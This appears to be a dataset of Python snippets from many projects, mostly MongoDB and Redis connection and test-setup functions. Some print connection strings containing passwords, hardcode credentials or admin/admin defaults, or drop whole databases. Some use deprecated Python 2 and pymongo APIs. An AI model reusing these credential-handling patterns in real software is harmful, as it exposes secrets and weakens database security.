[ "def mongodb_init(cls, host=\"127.0.0.1\", port=27017, username=\"\", password=\"\", dbname=\"admin\"):\n if username and password:\n uri = \"mongodb://{username}:{password}@{host}:{port}/{dbname}\".format(username=quote_plus(username),\n password=quote_plus(password),\n host=quote_plus(host),\n port=port,\n dbname=dbname)\n else:\n uri = \"mongodb://{host}:{port}/{dbname}\".format(host=host, port=port, dbname=dbname)\n cls._mongo_client = motor.motor_asyncio.AsyncIOMotorClient(uri, connectTimeoutMS=5000, serverSelectionTimeoutMS=5000)\n #LoopRunTask.register(cls._check_connection, 2)\n SingleTask.call_later(cls._check_connection, 2) #模拟串行定时器,避免并发\n logger.info(\"create mongodb connection pool.\")", "def setUp(self):\n self.db_name = '_mongolog_test'\n self.collection_name = 'log'\n\n self.conn = pymongo.MongoClient()\n self.db = self.conn[self.db_name]\n self.collection = self.db[self.collection_name]\n\n #self.conn.drop_database(self.db_name)", "def connect(self):\n self.client = MongoClient(self.mongo_uri)\n self.db = self.client[self.db_name]", "def mongodb_init():\n # Load environment variables\n dotenv_path = find_dotenv()\n load_dotenv(dotenv_path)\n\n # Connect to the db\n # DB will be created if it doesn't already exist\n client = pymongo.MongoClient(os.environ.get(\"DATABASE_URL\"), 27017)\n # 'tweetbase' is the database name\n db = client.tweetbase\n\n #Sets both the tweet ID and user ID strings as unique indexes\n db.tweets.create_index([(\"id_str\", 1),\n (\"user.id_str\", 1)],\n unique=True)\n\n # The db is only actually created when something is inserted\n # So this inserts a test document and immediately deletes it...\n # AND EVERYTHING ELSE\n # DO NOT RUN THIS ON A DB YOU WANT TO KEEP. SERIOUSLY.\n db.tweets.insert_one({\"id_str\": 1, \"user\": {\"id_str\": 5}})\n db.tweets.remove()", "def connect_mongo():\n global MONGO_CLIENT\n\n with open('config.json') as config_file:\n config_data = json.load(config_file)\n\n MONGO_CLIENT = init_mongodb(config_data['mongo_host'],\n config_data['mongo_port'], keep_existing=True)", "def initState(currentState):\n\n global client , db \n\n print(\"<<INIT>>\")#DEBUG\n print(f\"mongodb+srv://{username}:{password}@cluster0.70rhn.mongodb.net/{dbname}?retryWrites=true&w=majority\")\n connected = False\n client = None\n while not connected:\n client = MongoClient(f\"mongodb+srv://{username}:{password}@cluster0.70rhn.mongodb.net/{dbname}?retryWrites=true&w=majority\")\n connected = not client == None\n db = client.texet\n return 'watch'", "def setup_method(self, method):\n\n connect('authserver-db-test', host='mongomock://localhost', alias='test')", "def Mongodb_Connection():\r\n \r\n client = pymongo.MongoClient(\"localhost\", 27017)\r\n db = client.test\r\n\r\n\r\n if db.Transaction.estimated_document_count() != 0:\r\n \"\"\"\r\n To make a new test, the database is cleared if not empty\r\n \"\"\"\r\n \r\n db.command(\"dropDatabase\")\r\n \r\n return db", "def setup_mongodb(app, host=None, port=None, pool_size=None,\n auto_start_request=None):\n app.add_config_var('mongodb/host', str, host)\n app.add_config_var('mongodb/port', int, port)\n app.add_config_var('mongodb/pool_size', int, pool_size)\n app.add_config_var('mongodb/auto_start_request', bool, auto_start_request)\n\n def _open_connection():\n \"\"\"Opens a new connection to a Mongo instance at host:port.\"\"\"\n host = app.conf['mongodb/host']\n port = app.conf['mongodb/port']\n pool_size = app.conf['mongodb/pool_size']\n auto_start_request = app.conf['mongodb/auto_start_request']\n\n 
try:\n db_connection = connection.Connection(\n host=host, port=port, pool_size=pool_size,\n auto_start_request=auto_start_request)\n except connection.ConnectionFailure:\n # Gets the values that are used to connect to Mongo server.\n if not host:\n _host = connection.Connection.HOST\n else:\n _host = host\n if not port:\n _port = connection.Connection.PORT\n else:\n _port = port\n\n print(\"Could not connect. Be sure that Mongo is running on %s:%d\" %\n (_host, _port))\n\n # 'local' is 1 per thread, 'app' might be shared between thread.\n # So if the connection object is thread safe (Pymongo does),\n # you can use 'app', otherwise you will need a connection per thread.\n #\n # local.mongodb_connection = db_connection\n app.mongodb_connection = db_connection\n\n app.connect_event('wsgi-call', _open_connection)", "def init_mongo_db():\n try:\n app.mongo.cx.server_info()\n app.mongo.db = app.mongo.cx[\"kamistudio\"]\n if \"kami_corpora\" not in app.mongo.db.collection_names():\n app.mongo.db.create_collection(\"kami_corpora\")\n app.mongo.db.kami_corpora.create_index(\"id\", unique=True)\n\n if \"kami_models\" not in app.mongo.db.collection_names():\n app.mongo.db.create_collection(\"kami_models\")\n app.mongo.db.kami_models.create_index(\"id\", unique=True)\n\n if \"kami_definitions\" not in app.mongo.db.collection_names():\n app.mongo.db.create_collection(\"kami_definitions\")\n app.mongo.db.kami_definitions.create_index(\"id\", unique=True)\n\n if \"kami_new_definitions\" not in app.mongo.db.collection_names():\n app.mongo.db.create_collection(\"kami_new_definitions\")\n\n except ServerSelectionTimeoutError as e:\n app.mongo.db = None", "def connection():\n from mongoengine import connect\n\n connect(host=\"mongomock://localhost\", alias=\"default\")", "def global_init(name='ramen2'):\n mongoengine.register_connection(alias=\"core\",name=name)", "def _connect(self, **kwargs):\n global _connection\n if self.reuse and _connection:\n self.connection = _connection\n else:\n if pymongo.version_tuple[0] < 3:\n try:\n self.connection = Connection(host=self.host,\n port=self.port, **kwargs)\n # pymongo >= 3.0 does not raise this error\n except PyMongoError:\n if self.fail_silently:\n return\n else:\n raise\n else:\n self.connection = Connection(host=self.host, port=self.port,\n **kwargs)\n try:\n self.connection.is_locked\n except ServerSelectionTimeoutError:\n if self.fail_silently:\n return\n else:\n raise\n _connection = self.connection\n\n self.db = self.connection[self.database_name]\n if self.username is not None and self.password is not None:\n auth_db = self.connection[self.authentication_database_name]\n self.authenticated = auth_db.authenticate(self.username,\n self.password)\n\n if self.capped:\n #\n # We don't want to override the capped collection\n # (and it throws an error anyway)\n try:\n self.collection = Collection(self.db, self.collection_name,\n capped=True, max=self.capped_max,\n size=self.capped_size)\n except OperationFailure:\n # Capped collection exists, so get it.\n self.collection = self.db[self.collection_name]\n else:\n self.collection = self.db[self.collection_name]", "def setUp(self):\n self.db_name = '_mongolog_test_dict'\n self.collection_name = 'log_test'\n\n self.configDict = {\n 'version': 1,\n 'handlers': {\n 'mongo': {\n 'class': 'mongolog.handlers.MongoHandler',\n 'db': self.db_name,\n 'collection': self.collection_name,\n 'level': 'INFO'\n }\n },\n 'root': {\n 'handlers': ['mongo'],\n 'level': 'INFO'\n }\n }\n\n self.conn = Connection('localhost')\n 
self.conn.drop_database(self.db_name)", "def init_db_command():\n init_client()\n click.echo('Initialized MongoClient.')", "def __init__(self):\n client = MongoClient(\n settings.MONGODB_SERVER,\n settings.MONGODB_PORT\n )\n db = client[settings.MONGODB_DB]\n self.collection = db[settings.MONGODB_COLLECTION]", "async def init_mongodb(app: web.Application) -> None:\n try:\n log.info(f'Initializing the MongoDB database Async & Sync Mongo DB')\n await asyncio.sleep(1)\n config = app['config']['mongodb']\n\n _url = await _construct_db_url(config)\n log.info(f'Mongo URL - {_url}')\n\n # Creating the Pymongo DB instance\n await _get_pymongo_instance(app, _url)\n\n # Creating the AsyncIOMotorClient DB instance\n await _get_asynciomotor_instance(app, _url)\n\n except Exception as e:\n log.error(f'init_mongodb {e}')\n raise e", "def tear_down_mongo(self):\r\n split_db = self.split_mongo.db\r\n # old_mongo doesn't give a db attr, but all of the dbs are the same\r\n split_db.drop_collection(self.old_mongo.collection)", "def __init__(self):\n self.client = MongoClient('localhost', 27017)#27017\n self.db = self.client.greency_db\n self.collection = self.db.inventory", "def __init__(self, db_name):\n uri = re.sub('<username>', mongoUser, connection_uri)\n uri = re.sub('<password>', mongoPassword, uri)\n self.client = pymongo.MongoClient(uri)\n # Create your database\n self.db = self.client[db_name]", "def setup_tap_mongodb(self):\n db_script = os.path.join(DIR, '..', '..', 'db', 'tap_mongodb.sh')\n self._run_command(db_script)", "def connection(request):\n\tconnection = pymongo.MongoClient('mongodb://localhost/test')\n\t\n\trequest.addfinalizer(partial(connection.drop_database, 'test'))\n\treturn connection", "async def connect():\n db.client = AsyncIOMotorClient(str(mongo_url),\n maxPoolSize=mongo_max_connections,\n minPoolSize=mongo_min_connections)\n \n print(f\"Connected to mongo at {mongo_url}\")", "def __enter__(self):\n self.connection = MongoClient(self.host, self.port)\n return self", "def reconnect(self):\n try:\n self.redis = Redis(self.servers, self.port, self.db)\n except Exception, e:\n print e", "def __init__(self, host=\"localhost\", port=27017):\n self._client = MongoClient(host, port)", "def init_app(self, app):\n super().init_app(app)\n\n info = uri_parser.parse_uri(app.settings['MONGODB_URI'])\n if not info['database']:\n raise ValueError('A database name must be specified.')\n app.settings['MONGODB_DATABASE'] = info['database']\n app.settings['MONGODB_USERNAME'] = info['username']\n app.settings['MONGODB_PASSWORD'] = info['password']\n\n app.settings['MONGODB_USE_SSL'] = info['options'].get('ssl', False)\n\n app.settings['MONGODB_AUTH_MECHANISM'] = info['options'].get(\n 'authmechanism', 'DEFAULT')\n\n # X.509\n app.settings['MONGODB_SSL_CERTFILE'] = info['options'].get(\n 'ssl_certfile')\n app.settings['MONGODB_SSL_CA_CERTS'] = info['options'].get(\n 'ssl_ca_certs')\n\n app.settings['MONGODB_REPLICA_SET'] = info['options'].get(\n 'replicaset')\n app.settings['MONGODB_MAX_POOL_SIZE'] = info['options'].get(\n 'max_pool_size')\n app.settings['MONGODB_CONNECT'] = info['options'].get(\n 'auto_start_request', False)\n\n # Keyword arguments that will be passed to the MongoDB client.\n kwargs = {\n 'host': app.settings['MONGODB_URI'],\n 'ssl': app.settings['MONGODB_USE_SSL'],\n 'document_class': app.settings['MONGODB_DOCUMENT_CLASS'],\n 'maxPoolSize': app.settings['MONGODB_MAX_POOL_SIZE'],\n 'tz_aware': app.settings['MONGODB_TIME_ZONE_AWARE'],\n 'connect': 
app.settings['MONGODB_CONNECT'],\n }\n\n if app.settings['MONGODB_REPLICA_SET']:\n kwargs['replicaSet'] = app.settings['MONGODB_REPLICA_SET']\n\n self._auth = {\n 'name': app.settings['MONGODB_USERNAME'],\n }\n if self._auth['name']:\n self._auth['mechanism'] = app.settings['MONGODB_AUTH_MECHANISM']\n if app.settings['MONGODB_AUTH_MECHANISM'] == 'MONGODB-X509':\n kwargs['ssl_cert_reqs'] = ssl.CERT_REQUIRED\n kwargs['ssl_certfile'] = app.settings['MONGODB_SSL_CERTFILE']\n kwargs['ssl_ca_certs'] = app.settings['MONGODB_SSL_CA_CERTS']\n\n if not (kwargs['ssl_certfile'] and kwargs['ssl_ca_certs']):\n raise ValueError(\n 'To use X.509, both the certificate file and the '\n 'certificate authority file must be specified.'\n )\n else:\n # Otherwise use username and password authentication.\n self._auth['password'] = app.settings['MONGODB_PASSWORD']\n\n if any(self._auth.values()) and not all(self._auth.values()):\n # Make sure that if any authentication settings are\n # provided, all authentication settings are provided. This\n # should only apply to username and password authentication.\n # NOTE: The pymongo URI parser will raise\n # pymongo.errors.InvalidURI if the username is empty.\n raise ValueError(\n 'Username and password must be specified together or '\n 'not at all.'\n )\n\n self.client = MongoClient(**kwargs)\n\n # If a database name was provided, store the name so that the\n # db property can be used.\n self._db = app.settings['MONGODB_DATABASE']", "def test_enchants():\n mongo = pymongo.MongoClient()\n populate_db(mongo.roguesim_python)", "def __init__(self,\n mongo_uri='',\n mongo_host='localhost',\n mongo_port=27017,\n mongo_user='',\n mongo_pass='',\n db_name='crits'):\n # If the user provided a URI, we will use that. Otherwise we will build\n # a URI from the other arguments.\n if mongo_uri != '':\n self.mongo_uri = mongo_uri\n else:\n # Build the authentication portion. Simple authentication only for\n # now.\n auth_str = ''\n if mongo_user != '':\n auth_str = mongo_user\n if mongo_pass != '' and mongo_user != '':\n auth_str = auth_str + ':' + mongo_pass\n if auth_str != '':\n auth_str = auth_str + '@'\n # Build the URI\n self.mongo_uri = 'mongodb://{}{}:{}'.format(auth_str, mongo_host,\n mongo_port)\n self.db_name = db_name\n self.client = None\n self.db = None", "def _reset(base: pymongo.database.Database) -> None:\n if base:\n for collection in base.list_collection_names():\n _reset_collection(base, collection)", "def connect_to_mongo(self, host_name=lab_hostname, mongo_port=real_mongo_port):\n try:\n self.mongo_client = pymongo.MongoClient(host_name, mongo_port)\n except Exception as e:\n print(\"Cannot connect to the Mongo Client at port {}. 
Error is {}\".format(mongo_port, e))", "def create_mongodb(config):\n\n \n mongo_url = \"mongodb://\"\n mongo_url += \",\".join(map(lambda srv: srv['host'] + \":\" + str(srv['port']), config['data']['mongoServers']))\n \n if 'replica' in config['data']:\n mongo_url += \"/?replicaSet={0}\".format(config['data']['replica'])\n\n client = MongoClient(mongo_url)\n\n return client", "async def connect_mongodb():\n logging.debug(\"Connecting to database client\")\n db.client = AsyncIOMotorClient(MONGODB_URI)", "def __init__(self):\n client = pymongo.MongoClient(os.getenv(\"MONGO_URI\"))\n if DEBUG or os.getenv(\"CI\"):\n self.db = client[os.getenv(\"TESTDB\")]\n else:\n self.db = client[os.getenv(\"DB\")]", "def open_db_connection():\n client = MongoClient() #'104.131.185.191', 27017\n db = client[\"225VOH\"]\n return client, db", "def test_relic():\n mongo_db = pymongo.MongoClient()\n init_db(mongo_db.roguesim_python)\n populate_db(mongo_db.roguesim_python)", "def _pre_setup(self):\r\n\r\n # Flush the Mongo modulestore\r\n ModuleStoreTestCase.drop_mongo_collections()\r\n\r\n # Call superclass implementation\r\n super(ModuleStoreTestCase, self)._pre_setup()", "def check_server_up(self):\n print \"Connecting to Mongo at %s:%s\" % (self.hostname, self.port)\n try:\n # TODO: update this to use new pymongo Client\n self.api = pymongo.Connection(self.hostname, self.port)\n return True\n except (AutoReconnect, ConnectionFailure), e:\n print e\n return False", "def _connect(self):\n try: \n self.r = redis.StrictRedis(host=self.host, port=self.port, db=self.db)\n except:\n raise", "def mongodb():\n DB.init(get_env('MONGODB_DATABASE_TEST'))\n yield DB\n DB.clean_data('tweets')", "def mongodb_drop():\n # Load environment variables\n dotenv_path = find_dotenv()\n load_dotenv(dotenv_path)\n # Connect to the db\n # DB will be created if it doesn't already exist\n client = pymongo.MongoClient(os.environ.get(\"DATABASE_URL\"), 27017)\n client = client.drop_database(\"tweetbase\")", "def setup_target_db(self):\n conn = MongoClient(host=self._target_host)\n conn['admin'].authenticate(self._user, self._password)\n return conn", "def test_passing_connection(self):\n Pet.init_db(Redis(host=REDIS_HOST, port=REDIS_PORT))\n self.assertIsNotNone(Pet.redis)", "def _connect(self):\n self.connection = RedisConnection(self.host, self.port, self.dbname)", "def mongo_connect(\n password,\n user='RCD2021',\n dbname='myFirstDatabase'\n):\n\n client = pymongo.MongoClient(f\"mongodb+srv://{user}:{password}\\\[email protected]/{dbname}?retryWrites=true&w=majority\")\n db = client.test\n\n return db", "def mmo_connect(self):\n client = MongoClient(self.hostname, self.port)\n client[self.authentication_db].authenticate(self.username, self.password)\n if self.mmo_is_mongos(client) == False:\n raise Exception(\"MongoDB connection is not a mongos process\")\n else:\n return client", "def mongodb_connect():\n # Load environment variables\n dotenv_path = find_dotenv()\n load_dotenv(dotenv_path)\n # Connect to the db\n # DB will be created if it doesn't already exist\n client = pymongo.MongoClient(os.environ.get(\"DATABASE_URL\"), 27017)\n db = client.tweetbase\n return db", "def bootstrap(self):\n\n self.db = connection_manager.get(DbConnection, host=self.ip, port=3306, user=self.user, password=self.password)\n\n self.connected = True", "def _connect(self):\n conn = pymongo.MongoClient(self._config.get('mongodb', 'host'), self._config.getint('mongodb', 'port'))\n db = conn[self._config.get('mongodb', 'db')]\n return 
db[self._config.get('mongodb', 'collection')]", "def mmo_connect_mongod(self, hostname=\"localhost\", port=27017, username=\"admin\", password=\"admin\", authentication_db=\"admin\"):\n if self.mmo_is_mongo_up(hostname, port):\n client = MongoClient(hostname, port)\n client[authentication_db].authenticate(username, password)\n if self.mmo_is_mongod(client) == False:\n raise Exception(\"MongoDB connection is not a mongod process\")\n else:\n return client\n else:\n raise Exception(\"mongod process is not up\")", "def init_db(self):\n _client = pymongo.MongoClient(username=self.config['database']['admin'],\n password=self.config['database']['admin_pwd'],\n host=self.config['database']['host'],\n port=self.config['database']['port'])\n # _id: db_name.user_name\n user_ids = [_u['_id'] for _u in _client.admin.system.users.find({}, {'_id': 1})]\n\n db_name = self.config['database']['db']\n username = self.config['database']['user']\n\n # print(f'{db_name}.{username}')\n # print(user_ids)\n\n if f'{db_name}.{username}' not in user_ids:\n _client[db_name].command('createUser', self.config['database']['user'],\n pwd=self.config['database']['pwd'], roles=['readWrite'])\n print('Successfully initialized db')", "def __init__(self, ):\n super().__init__()\n self.duplicate_posts = 0\n self.new_posts = 0\n self.client = MongoClient('mongodb://{}:{}/'.format(_config['db']['hostname'], _config['db']['port']))\n self.db = self.client[_config['db']['database']]\n self.posts = self.db[_config['db']['collection']]\n self.posts.ensure_index(\"postId\", unique=True)", "def __init__(self, **kwargs):\r\n\r\n super(MongoBackend, self).__init__(**kwargs)\r\n\r\n # Extract connection parameters from kwargs\r\n\r\n host = kwargs.get('host', 'localhost')\r\n port = kwargs.get('port', 27017)\r\n\r\n user = kwargs.get('user', '')\r\n password = kwargs.get('password', '')\r\n\r\n db_name = kwargs.get('database', 'track')\r\n collection_name = kwargs.get('collection', 'events')\r\n\r\n # Other mongo connection arguments\r\n extra = kwargs.get('extra', {})\r\n\r\n # By default disable write acknowledgments, reducing the time\r\n # blocking during an insert\r\n extra['w'] = extra.get('w', 0)\r\n\r\n # Make timezone aware by default\r\n extra['tz_aware'] = extra.get('tz_aware', True)\r\n\r\n # Connect to database and get collection\r\n\r\n self.connection = MongoClient(\r\n host=host,\r\n port=port,\r\n **extra\r\n )\r\n\r\n database = self.connection[db_name]\r\n\r\n if user or password:\r\n database.authenticate(user, password)\r\n\r\n self.collection = database[collection_name]\r\n\r\n self._create_indexes()", "def connect_to_mongo(self, host='127.0.0.1', port=27017, instance='local'):\n if instance == 'prod':\n logging.info('connecting to mongo Atlas')\n self.db_client = MongoClient('mongodb+srv://{}:{}@{}/'\n '{}?retryWrites=true&w=majority'.format(self.config['db']['username'],\n self.config['db']['password'],\n self.config['db']['atlas'],\n self.db_name))\n else:\n logging.info('connecting to local Atlas')\n self.db_client = MongoClient(host, port)", "def __init__(self, dst_mongodb_uri, dst_database, dst_collection, dry_run):\n self.client = pymongo.MongoClient(dst_mongodb_uri)\n self.dst_mongodb_uri = dst_mongodb_uri\n self.lookup_col = self.client[dst_database][dst_collection]\n self.dry_run = dry_run", "def __init__(self, port):\n self.db = MongoClient('localhost', port)['291db']\n self.posts = db[\"Posts\"]\n self.votes = db[\"Votes\"]\n self.tags = db[\"Tags\"]\n self.uid = None", "def __init__(self, 
conf_settings):\n self.conf_settings = conf_settings\n self.db_type = \"crits\"\n self.db_client = pymongo.MongoClient(str(self.conf_settings['mongo_uri']))\n self.db_conn = self.db_client[\"crits\"]\n if self.conf_settings['mongo_user']:\n\t\t\tself.db_conn.authenticate(str(self.conf_settings['mongo_user']), str(self.conf_settings['mongo_password']))\n self.set_database_defaults()\n self.CRITs_mappings()", "def did_mongod_start(self, port=0, timeout=60):\r\n if port == 0:\r\n port = self.port\r\n \r\n while timeout > 0:\r\n time.sleep(1)\r\n try:\r\n _connect_to_mongo_port(int(port))\r\n return True\r\n except OSError as ex:\r\n print >> sys.stderr, ex\r\n timeout = timeout - 1\r\n except Exception as ex:\r\n print >> sys.stderr, ex\r\n timeout = timeout - 1\r\n print >> sys.stderr, \"timeout starting mongod\"\r\n return False", "def get_mongo_conn():\n MONGO_URI = 'mongodb://saran:[email protected]:13736/ingredientmaster'\n client = pymongo.MongoClient(MONGO_URI)\n db = client.get_database('ingredientmaster')\n return db", "def do_connection(\r\n db, collection, host, port=27017, tz_aware=True, user=None, password=None, **kwargs\r\n ):\r\n self.database = pymongo.database.Database(\r\n pymongo.MongoClient(\r\n host=host,\r\n port=port,\r\n tz_aware=tz_aware,\r\n # deserialize dicts as SONs\r\n document_class=SON,\r\n **kwargs\r\n ),\r\n db\r\n )\r\n self.collection = self.database[collection]\r\n\r\n if user is not None and password is not None:\r\n self.database.authenticate(user, password)", "def get_connection():\n return MongoClient(\"mongodb://username:password@localhost:27017\")", "def mongo_client():\n return MongoClient(STRING_CONNECTION)", "def test_rollback(self):\n os.system('rm config.txt; touch config.txt')\n test_oplog, primary_conn, mongos, solr = self.get_new_oplog()\n\n if not start_cluster():\n self.fail('Cluster could not be started successfully!')\n\n solr = DocManager()\n test_oplog.doc_manager = solr\n solr._delete() # equivalent to solr.delete(q='*: *')\n\n mongos['test']['test'].remove({})\n mongos['test']['test'].insert( \n {'_id': ObjectId('4ff74db3f646462b38000001'),\n 'name': 'paulie'},\n safe=True\n )\n while (mongos['test']['test'].find().count() != 1):\n time.sleep(1)\n cutoff_ts = test_oplog.get_last_oplog_timestamp()\n\n first_doc = {'name': 'paulie', '_ts': bson_ts_to_long(cutoff_ts),\n 'ns': 'test.test',\n '_id': ObjectId('4ff74db3f646462b38000001')}\n\n #try kill one, try restarting\n kill_mongo_proc(primary_conn.host, PORTS_ONE['PRIMARY'])\n\n new_primary_conn = Connection(HOSTNAME, int(PORTS_ONE['SECONDARY']))\n admin = new_primary_conn['admin']\n while admin.command(\"isMaster\")['ismaster'] is False:\n time.sleep(1)\n time.sleep(5)\n count = 0\n while True:\n try:\n mongos['test']['test'].insert({\n '_id': ObjectId('4ff74db3f646462b38000002'),\n 'name': 'paul'}, \n safe=True)\n break\n except OperationFailure:\n count += 1\n if count > 60:\n self.fail('Call to insert doc failed too many times')\n time.sleep(1)\n continue\n while (mongos['test']['test'].find().count() != 2):\n time.sleep(1)\n kill_mongo_proc(primary_conn.host, PORTS_ONE['SECONDARY'])\n start_mongo_proc(PORTS_ONE['PRIMARY'], \"demo-repl\", \"/replset1a\",\n \"/replset1a.log\", None)\n\n #wait for master to be established\n while primary_conn['admin'].command(\"isMaster\")['ismaster'] is False:\n time.sleep(1)\n\n start_mongo_proc(PORTS_ONE['SECONDARY'], \"demo-repl\", \"/replset1b\",\n \"/replset1b.log\", None)\n\n #wait for secondary to be established\n admin = 
new_primary_conn['admin']\n while admin.command(\"replSetGetStatus\")['myState'] != 2:\n time.sleep(1)\n while retry_until_ok(mongos['test']['test'].find().count) != 1:\n time.sleep(1)\n\n self.assertEqual(str(new_primary_conn.port), PORTS_ONE['SECONDARY'])\n self.assertEqual(str(primary_conn.port), PORTS_ONE['PRIMARY'])\n\n last_ts = test_oplog.get_last_oplog_timestamp()\n second_doc = {'name': 'paul', '_ts': bson_ts_to_long(last_ts),\n 'ns': 'test.test', \n '_id': ObjectId('4ff74db3f646462b38000002')}\n\n test_oplog.doc_manager.upsert(first_doc)\n test_oplog.doc_manager.upsert(second_doc)\n\n test_oplog.rollback()\n test_oplog.doc_manager.commit()\n results = solr._search()\n\n assert(len(results) == 1)\n\n self.assertEqual(results[0]['name'], 'paulie')\n self.assertTrue(results[0]['_ts'] <= bson_ts_to_long(cutoff_ts))\n\n #test_oplog.join()", "def __init__(self, db_cfg_name, collection_cfg_name, mode = 'r'):\n from ir_config import IRConfig\n connection = IRMongodbHelper.get_instance().get_connection()\n self.__db_name = IRConfig.get_instance().get(db_cfg_name)\n self.__collection_name = IRConfig.get_instance().get(collection_cfg_name)\n self.__mode = mode\n self.__collection = connection[self.__db_name][self.__collection_name]\n self.__is_closed = False\n if mode != 'r':\n IRMongodbHelper.get_instance().update_meta(\n self.__db_name, self.__collection_name, False)\n if mode == 'w':\n self.__collection.drop()", "def __init__(self):\n self.__default_config = ConfigParams.from_tuples(\n 'options.max_pool_size', 2,\n 'options.connect_timeout', 5000,\n 'options.auto_reconnect', True,\n 'options.max_page_size', 100,\n 'options.debug', True\n )\n\n # The logger\n self._logger: CompositeLogger = CompositeLogger()\n # The connection resolver\n self._connection_resolver: MongoDbConnectionResolver = MongoDbConnectionResolver()\n # The configuration options.\n self._options: ConfigParams = ConfigParams()\n # The MongoDB connection object.\n self._connection: pymongo.MongoClient = None\n # The MongoDB database name.\n self._database_name: str = None\n # The MongoDb database object.\n self._db: database.Database = None", "def open_mongo() -> None:\n os.system('launchctl start homebrew.mxcl.mongodb-community')", "def __init__(self, source='10.0.2.32', is_local=False):\n super().__init__(source, is_local)\n self.client = MongoClient(source)", "def __init__(self):\n self._rcon = None\n self._host = CONFIG.redis.host\n self._port = CONFIG.redis.port\n self._db = CONFIG.redis.database\n self.refresh()", "def reset(self):\n self.reconnect()", "def __init__(self, client=None, timeout=300, database_name=None, host=None, port=None):\n self.client = MongoClient() if client is None else client\n self.db = self.client.cache\n self.timeout = timeout", "def setUp(self):\n self.conn = seed.connect_to_db(\"testing\")\n self.cur = self.conn.cursor()\n\n # setting cur and conn in seed to test cur and conn (if we don't do this we get a 'cur is undefined' error)\n seed.cur = self.conn.cursor()\n seed.conn = self.conn", "def configure(self, options, conf):\n # This option has to be specified on the command line, to enable the\n # plugin.\n if not options.mongoengine or options.mongodb_bin:\n return\n\n if not options.mongodb_bin:\n self.mongodb_param['mongodb_bin'] = scan_path()\n if self.mongodb_param['mongodb_bin'] is None:\n raise AssertionError(\n \"Mongoengine plugin enabled, but no mongod on path, \"\n \"please specify path to binary\\n\"\n \"ie. 
--mongoengine-mongodb=/path/to/mongod\")\n else:\n self.mongodb_param['mongodb_bin'] = os.path.abspath(\n os.path.expanduser(os.path.expandvars(options.mongodb_bin)))\n if not os.path.exists(self.mongodb_param['mongodb_bin']):\n raise AssertionError(\n \"Invalid mongodb binary %r\" % \\\n self.mongodb_param['mongodb_bin'])\n\n # Its necessary to enable in nose\n self.enabled = True\n\n db_log_path = os.path.expandvars(os.path.expanduser(\n options.mongodb_logpath))\n try:\n db_file = open(db_log_path, \"w\")\n db_file.close()\n except Exception as exc:\n raise AssertionError(\"Invalid log path %r\" % exc)\n\n if not options.mongodb_port:\n self.mongodb_param['db_port'] = get_open_port()\n else:\n self.mongodb_param['db_port'] = options.mongodb_port\n\n db_prealloc = options.mongodb_prealloc\n db_scripting = options.mongodb_scripting\n\n self.clear_context['module'] = options.mongoengine_clear_after_module\n self.clear_context['class'] = options.mongoengine_clear_after_class\n\n # generate random database name\n self.database_name = str(uuid.uuid1())\n\n #########################################\n # Start a instance of mongo\n #########################################\n\n # Stores data here\n self.mongodb_param['db_path'] = tempfile.mkdtemp()\n if not os.path.exists(self.mongodb_param['db_path']):\n os.mkdir(self.mongodb_param['db_path'])\n\n args = [\n self.mongodb_param['mongodb_bin'],\n \"--dbpath\",\n self.mongodb_param['db_path'],\n \"--port\",\n str(self.mongodb_param['db_port']),\n # don't flood stdout, we're not reading it\n \"--quiet\",\n # save the port\n \"--nohttpinterface\",\n # disable unused.\n \"--nounixsocket\",\n # use a smaller default file size\n \"--smallfiles\",\n # journaling on by default in 2.0 and makes it to slow\n # for tests, can causes failures in jenkins\n \"--nojournal\",\n # Default is /dev/null\n \"--logpath\",\n db_log_path,\n \"-vvvvv\"\n ]\n\n if not db_prealloc:\n args.append(\"--noprealloc\")\n\n if not db_scripting:\n args.append(\"--noscripting\")\n\n self.process = Popen(\n args,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT\n )\n\n self._running = True\n os.environ[\"TEST_MONGODB\"] = \"localhost:%s\" % \\\n self.mongodb_param['db_port']\n os.environ[\"TEST_MONGODB_DATABASE\"] = self.database_name\n\n # Give a moment for mongodb to finish coming up\n time.sleep(float(options.wait_time))\n\n # Connecting using mongoengine\n self.connection = connect(self.database_name, host=\"localhost\",\n port=self.mongodb_param['db_port'])", "def __init__(self, mongodb_settings, interval, max_ops_limit):\n self.__conn = None\n self.__dbs = {}\n self.__interval = interval\n self.mongodb_settings = mongodb_settings\n self.max_ops_limit = max_ops_limit\n self.last_execution_time = time()\n self.results = {}", "def setUpClass(cls):\n\n if not dbenabled:\n print('Unable to run UserWAMPTests: mongodb not enabled')", "def load_mongo_configuration(ec2_conn,base_name,params ):\n print \"loading mongo configurings\"\n \n ## Allow security from build server to mongodb\n app_type = 'MONGO'\n \n mongo_sec_grp_name = get_secgrp_name( base_name, app_type )\n mongo_sec_grp = find_secgrp(ec2_conn, mongo_sec_grp_name)\n \n try :\n mongo_sec_grp.authorize( ip_protocol = \"tcp\",\n from_port = 27017,\n to_port = 27017,\n cidr_ip = build_server_cidr )\n except :\n print \"rule exists aready\" \n \n mongo_host = params.get( 'host' )\n mongo_port = params.get( 'port' )\n mongo_username = params.get( 'user-name' )\n mongo_password = params.get( 'password' )\n \n db_name = 
params.get( 'db_name' )\n collection_name = params.get( 'collection_name' )\n \n documents = params.get( 'documents' )\n \n uri = \"\"\n if len( mongo_username ) > 0 :\n uri = \"mongodb://\"+mongo_username+\":\"+mongo_password+\"@\"+mongo_host+\":\"+mongo_port+\"/\"\n else :\n uri = \"mongodb://\"+mongo_host+\":\"+mongo_port+\"/\"\n \n print \"Mongo Connect URL:\" +uri\n \n \n client = MongoClient(uri)\n \n\n db = client[db_name]\n collection = db[collection_name ]\n \n collection.remove()\n \n for document in documents :\n document = json.dumps(document)\n document = loads(document)\n collection.insert(document)\n document['createdTime'] = datetime.datetime.utcnow()\n collection.save(document)\n \n ## At the end revoke the build server rule \n try :\n mongo_sec_grp.revoke( ip_protocol = \"tcp\",\n from_port = 27017,\n to_port = 27017,\n cidr_ip = build_server_cidr)\n \n except :\n print \"exception removing rule\"\n \n print \"configured\"", "def start(self) -> None:\n if not self._mongo_available:\n return\n operations_thread = threading.Thread(target=self._run, args=())\n operations_thread.setDaemon(True)\n operations_thread.start()", "def connectToMongo():\n mongodb_uri = os.environ.get(\"DATABASE_URI\", \"\") or \"mongodb://localhost:27017\" \n client = pymongo.MongoClient(mongodb_uri)\n return client.insights_db # Declare the DB", "def __init__(\r\n self, db, collection, host, port=27017, tz_aware=True, user=None, password=None, **kwargs\r\n ):\r\n self.database = pymongo.database.Database(\r\n pymongo.MongoClient(\r\n host=host,\r\n port=port,\r\n tz_aware=tz_aware,\r\n 